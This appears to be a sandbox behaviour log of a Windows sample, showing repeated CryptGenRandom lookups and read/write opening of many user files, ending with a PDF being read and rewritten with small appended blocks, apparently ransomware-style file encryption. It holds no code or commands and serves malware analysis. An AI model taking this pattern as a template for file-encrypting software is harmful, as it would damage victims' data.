| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\R6QY5M2ifYeXIFzAbryD.png, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Rw3B6OL.png, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\SDaC6UaMD-p1Jk.mp3, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\tVTfmiVg4ragt74J-.bmp, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\vO1f0VBn.mp4, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\WjWFRmK.swf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\XL3UQ.mp4, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\YO5CdbmrFGoGb.bmp, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\ySgEVn.xls, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\z28ae.mp4, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\_E9_ON r.gif, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\Temp\CalendarCache.dat, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\Unistore\data\AggregateCache.uca, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\UnistoreDB\store.vol, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\UnistoreDB\tmp.edb, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\UnistoreDB\USS.chk, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\UnistoreDB\USS.log, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\UnistoreDB\USSres00001.jrs, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\UnistoreDB\USSres00002.jrs, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\UnistoreDB\USStmp.log, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v4.0\ngen.log, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v4.0_32\ngen.log, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Feeds\FeedsStore.feedsdb-ms, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\FORMS\FRMDATA64.DAT, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\GameDVR\KnownGameList.bin, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\16.0\excel.exe_Rules.xml, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\16.0\mspub.exe_Rules.xml, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\16.0\officec2rclient.exe_Rules.xml, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\16.0\outlook.exe_Rules.xml, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\16.0\powerpnt.exe_Rules.xml, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\16.0\setup.exe_Rules.xml, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\16.0\winword.exe_Rules.xml, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\-e jJuv2TeKL.pdf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\-e jJuv2TeKL.pdf, size = 1048576, size_out = 8860 |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\-e jJuv2TeKL.pdf, size = 8864 |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\-e jJuv2TeKL.pdf, size = 256 |
|
2 | |
| File | Write | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\-e jJuv2TeKL.pdf, size = 16 |
|
1 | |
